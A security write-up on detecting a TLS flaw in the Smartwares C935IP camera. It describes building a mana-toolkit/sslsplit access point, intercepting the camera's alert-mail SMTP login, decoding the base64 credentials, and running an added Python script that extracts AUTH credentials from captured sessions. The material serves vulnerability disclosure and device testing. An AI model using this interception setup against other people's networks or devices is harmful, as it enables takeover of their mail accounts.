Detecting the Smartwares C935IP SSL Vulnerability

Author: Mathis Hagen
Date: 2017-05-24 13:44:37

Content Table

Introduction
Requirements
Testing
Conclusion

1. Introduction

In this article we are going to have a look at how we found the vulnerability of the Smartwares C935IP camera. The camera's e-mail functionality was vulnerable to a MITM attack using sslstrip, as described in our short report. The vulnerability allows an attacker on the same network to take over the e-mail account the camera uses for alerts. We will explain how we set up a host machine as an access point (AP) and how to set up the mana-toolkit, our tool of choice in this case. Our goal is an AP with an active Internet connection and sslsplit/sslstrip running on it.

2. Requirements

Obviously this works best on Linux, so we assume a Linux system with the APT package manager. We further assume that the host system has an active Internet connection via WiFi/LAN. It is helpful to use an external WiFi card for hosting the AP; we, like SensePost, recommend the TL-WN722N USB card, mainly because it is cheap and supports packet injection. Note that only the v1 revision of that card (Atheros AR9271 chipset, ath9k_htc driver) is known to work well in AP mode; later revisions use a different chipset. The next step is the installation of the needed software. As mentioned earlier we are going to use the mana-toolkit. It is a toolkit created by SensePost and presented at Defcon 22 which is great at setting up rogue APs or, in our case, setting up an AP with sslsplit, sslstrip, firelamb and net-creds almost out of the box. If you are using Kali you can install it from the repositories via

sudo apt install mana-toolkit

Otherwise you have to build it from git, which is what we do here on Ubuntu 16.04.2. We install it under /opt/mana by changing to /opt and cloning the repository together with its submodules:

cd /opt
git clone --depth 1 https://github.com/sensepost/mana
cd mana
git submodule init
git submodule update

Afterwards we have all the files we need, but before running make we have to install some build dependencies. The repository ships an Ubuntu install script, but it did not work for us, so we install the needed packages via apt:

sudo apt update
sudo apt install libnl-genl-3-dev dnsmasq tinyproxy libssl-dev apache2 macchanger python-dnspython python-pcapy dsniff stunnel4 python-scapy libevent-dev make

Now we can install the mana-toolkit with

make
sudo make install

We could use the toolkit now, but first we install sslsplit from GitHub, because the current git version has an experimental feature we need for this test. To do so we clone the sslsplit repository and build it like this:

git clone https://github.com/droe/sslsplit
cd sslsplit
make
sudo make install

After installing sslsplit we have a look at the mana-toolkit start script we will use later. It is located at /opt/mana/run-mana/start-nat-full.sh. There are a couple of other scripts, but for now we stick with start-nat-full.sh, which starts a NATed AP with the full functionality of the mana-toolkit. A couple of things in it need to be changed for our setup.

Now we are good to go.

3. Testing

After configuring the setup it is time to use it. The first thing to do is to start the AP with our modified start-nat-full.sh script:

/opt/mana/run-mana/start-nat-full.sh

The next step is to connect both the smartphone running the OMGuard HD app and the camera to our AP, and to pair them with each other. Then enable the alert e-mail tick box in the camera's settings and enter your account information in the advanced settings tab; use a throwaway test account, because the credentials will end up in cleartext in the logs. If you use e.g. a Gmail account you can enable SSL, but it makes no difference for this test, since we can attack both implicit SSL and STARTTLS: sslsplit terminates the TLS connection with a forged certificate, which the camera accepts without complaint. As soon as you trigger the alert, via audio or motion, an e-mail is sent from the account you specified, and sslsplit intercepts and logs the communication with the mail server. The logs are stored under /var/lib/mana-toolkit and should contain a passage similar to this:

220 smtp.gmail.com ESMTP o22sm6089025wro.13 - gsmtp
EHLO mail.txt
250-smtp.gmail.com at your service, [79.205.255.208]
250-SIZE 35882577
250-8BITMIME
250-AUTH LOGIN PLAIN XOAUTH2 PLAIN-CLIENTTOKEN OAUTHBEARER XOAUTH
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-CHUNKING
250 SMTPUTF8
AUTH LOGIN dXNlcm5hbWVAZ21haWwuY29tCg==    (username@gmail.com, base64 encoded)
334 UGFzc3dvcmQ6
cGFzc3dvcmQK    (password, base64 encoded)
235 2.7.0 Accepted
MAIL FROM:
250 2.1.0 OK o22sm6089025wro.13 - gsmtp
RCPT TO:
250 2.1.5 OK o22sm6089025wro.13 - gsmtp
DATA
354 Go ahead o22sm6089025wro.13 - gsmtp
From: username@gmail.com
To: username
Subject: IPCAM Detector Alarm (2017-03-23 15:35:03) AAAA-000000-AAAAA    (unique camera ID)
MIME-version: 1.0
Content-type: text/html; charset=utf-8

2017-03-23 15:35:03 ......Motion detector alarm
.
250 2.0.0 OK 1490279709 o22sm6089025wro.13 - gsmtp
QUIT
221 2.0.0 closing connection o22sm6089025wro.13 - gsmtp

The username and password are only base64 encoded, not encrypted (the server's 334 challenge UGFzc3dvcmQ6 is just "Password:"). Decoding them, e.g. with base64 -d, gives full access to the account.
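To make the manual decoding repeatable, here is an added example (our own code, not part of the original article, the mana-toolkit or sslsplit): a small Python script that scans a captured plaintext SMTP session for AUTH LOGIN and AUTH PLAIN exchanges, decodes the credentials, and reports whether STARTTLS was offered and whether the client actually used it. Both sessions embedded in the script are constructed: the first mirrors the Gmail transcript above with the article's placeholder credentials (the client IP is replaced by a documentation address), the second is a hypothetical mail.example.net server that offers STARTTLS which the client ignores. It goes beyond the page in also handling AUTH PLAIN.

```python
# Added example (not part of the original article): scan a plaintext SMTP
# session, as sslsplit writes it to its log directory, and pull out the
# credentials a device sent with AUTH LOGIN or AUTH PLAIN. It also reports
# whether STARTTLS was offered and whether the client actually used it, so
# that an unencrypted login can be spotted at a glance.
import base64
import binascii
import re

# Constructed sample, modelled on the Gmail transcript in the article. The
# credentials are the article's placeholders (username@gmail.com / password,
# each followed by a newline because they were produced with `echo | base64`);
# the client address is a documentation address, not the one from the capture.
SAMPLE_LOGIN_LOG = """220 smtp.gmail.com ESMTP o22sm6089025wro.13 - gsmtp
EHLO mail.txt
250-smtp.gmail.com at your service, [198.51.100.23]
250-SIZE 35882577
250-8BITMIME
250-AUTH LOGIN PLAIN XOAUTH2 PLAIN-CLIENTTOKEN OAUTHBEARER XOAUTH
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-CHUNKING
250 SMTPUTF8
AUTH LOGIN dXNlcm5hbWVAZ21haWwuY29tCg==
334 UGFzc3dvcmQ6
cGFzc3dvcmQK
235 2.7.0 Accepted
MAIL FROM:<username@gmail.com>
250 2.1.0 OK o22sm6089025wro.13 - gsmtp
QUIT
221 2.0.0 closing connection o22sm6089025wro.13 - gsmtp
"""

# Second constructed sample (hypothetical server): STARTTLS is offered, but the
# client ignores it and authenticates with AUTH PLAIN in the clear.
SAMPLE_PLAIN_LOG = """220 mail.example.net ESMTP
EHLO camera
250-mail.example.net
250-STARTTLS
250 AUTH PLAIN LOGIN
AUTH PLAIN AHVzZXJAZXhhbXBsZS5jb20Ac2VjcmV0
235 2.7.0 Authentication successful
QUIT
221 Bye
"""

SERVER_REPLY = re.compile(r"^\d{3}[ -]")          # "250-...", "334 ...", "235 ..."
AUTH_CMD = re.compile(r"^AUTH\s+(LOGIN|PLAIN)(?:\s+(\S+))?$", re.I)


def b64_decode(token):
    """Decode one base64 token from the log; None if it is not valid base64.
    Only a trailing CR/LF is stripped, so the NUL separators of PLAIN survive."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", errors="replace").rstrip("\r\n")


def extract_credentials(log_text):
    """Return a list of {"mechanism", "username", "password"} dicts, one per
    AUTH LOGIN / AUTH PLAIN exchange found in the session."""
    lines = [l.strip() for l in log_text.splitlines()]
    creds = []
    i = 0
    while i < len(lines):
        m = AUTH_CMD.match(lines[i])
        i += 1
        if not m:
            continue
        mech = m.group(1).upper()
        # Client responses: an optional initial response on the AUTH line
        # itself, then one line after each "334" server challenge.
        responses = [m.group(2)] if m.group(2) and m.group(2) != "=" else []
        while i < len(lines):
            line = lines[i]
            if SERVER_REPLY.match(line):
                if not line.startswith("334"):
                    break                      # 235 accepted / 535 rejected: exchange over
            elif line:
                responses.append(line)
            i += 1
        decoded = [b64_decode(r) for r in responses]
        if mech == "LOGIN" and len(decoded) >= 2 and None not in decoded[:2]:
            creds.append({"mechanism": "LOGIN", "username": decoded[0], "password": decoded[1]})
        elif mech == "PLAIN" and decoded and decoded[0] is not None:
            parts = decoded[0].split("\0")     # authzid \0 authcid \0 password
            if len(parts) == 3:
                creds.append({"mechanism": "PLAIN", "username": parts[1], "password": parts[2]})
    return creds


def analyse_session(log_text):
    """Summarise a session: was STARTTLS offered, was it used, and which
    credentials were readable in the (decrypted or plaintext) stream."""
    lines = [l.strip() for l in log_text.splitlines()]
    offered = any(l.upper().startswith(("250-STARTTLS", "250 STARTTLS")) for l in lines)
    used = any(l.upper() == "STARTTLS" for l in lines)
    return {"starttls_offered": offered, "starttls_used": used,
            "credentials": extract_credentials(log_text)}


if __name__ == "__main__":
    for name, log in (("gmail (implicit SSL)", SAMPLE_LOGIN_LOG), ("AUTH PLAIN", SAMPLE_PLAIN_LOG)):
        print(name, analyse_session(log))
```

Feed it the session files sslsplit writes under /var/lib/mana-toolkit. Readable credentials in a session where STARTTLS was offered but never issued mean the client sent its login in the clear; readable credentials after a STARTTLS line, or in an implicit-SSL session, mean sslsplit terminated the TLS connection, i.e. the client accepted the forged certificate.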

4. Conclusion

Although, or rather because, this is a very simple test, it is worth having available: it provides a fast and easy way to test devices for weaknesses in their SSL/TLS implementations, such as accepting a forged certificate or falling back to plaintext.
